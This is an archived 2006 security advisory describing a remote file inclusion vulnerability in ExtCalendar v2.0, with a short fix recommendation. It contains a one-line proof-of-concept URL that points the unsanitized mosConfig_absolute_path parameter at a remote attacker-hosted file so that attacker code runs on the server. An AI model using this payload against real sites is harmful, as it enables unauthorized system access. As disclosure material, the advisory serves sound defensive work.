TUCoPS :: Web :: Apps :: b06-3473.htm

ExtCalendar <== v2.0 Remote File Include Vulnerabilities
ExtCalendar <== v2.0 Remote File Include Vulnerabilities
ExtCalendar <== v2.0 Remote File Include Vulnerabilities



ECHO.OR.ID=0D
ECHO_ADV_36$2006=0D
=0D
---------------------------------------------------------------------------=0D
[ECHO_ADV_36$2006] ExtCalendar <== v2.0 Remote File Include Vulnerabilities=0D
---------------------------------------------------------------------------=0D
=0D
Author          : Ahmad Maulana a.k.a Matdhule=0D
Date            : July 07th 2006=0D
Location        : Indonesia, Jakarta=0D
Web : http://advisories.echo.or.id/adv/adv36-matdhule-2006.txt=0D 
Critical Lvl    : Highly critical=0D
Impact          : System access=0D
Where           : From Remote=0D
---------------------------------------------------------------------------=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
ExtCalendar=0D
=0D
Application     : ExtCalendar=0D
version         : 2.0=0D
URL : http://extcal.sourceforge.net/=0D 
Description     :=0D
=0D
ExtCalendar is a powerful multi-user web-based calendar application. =0D
Features include Multi-Languages, Themes, Recurrent  Events, Categories, =0D
Users and Groups management, Environment and General Settings, Template Configuration, Product Updates.=0D
=0D
---------------------------------------------------------------------------=0D
=0D
Vulnerability:=0D
~~~~~~~~~~~~~~~=0D
=0D
in folder com_extcalendar we found vulnerability script extcalendar.php.=0D
=0D
-----------------------extcalendar.php----------------------=0D
....=0D
=0D
...=0D
----------------------------------------------------------=0D
=0D
Variables $mosConfig_absolute_path are not properly sanitized. When register_globals=on=0D
and allow_fopenurl=on an attacker can exploit this vulnerability with a=0D
simple php injection script.=0D
=0D
Proof Of Concept:=0D
~~~~~~~~~~~~~~~~=0D
=0D
http://[target]/[path]/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://attacker.com/evil.txt?=0D 
=0D
Solution:=0D
~~~~~~~~=0D
=0D
sanitize variabel $mosConfig_absolute_path in extcalendar.php=0D
=0D
=0D
---------------------------------------------------------------------------=0D
Shoutz:=0D
~~~~~~=0D
~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson :)=0D
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous=0D
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama=0D
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com=0D 
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net=0D 
---------------------------------------------------------------------------=0D
Contact:=0D
~~~~~~~=0D
=0D
     matdhule[at]gmail[dot]com=0D
     =0D
-------------------------------- [ EOF ] ----------------------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH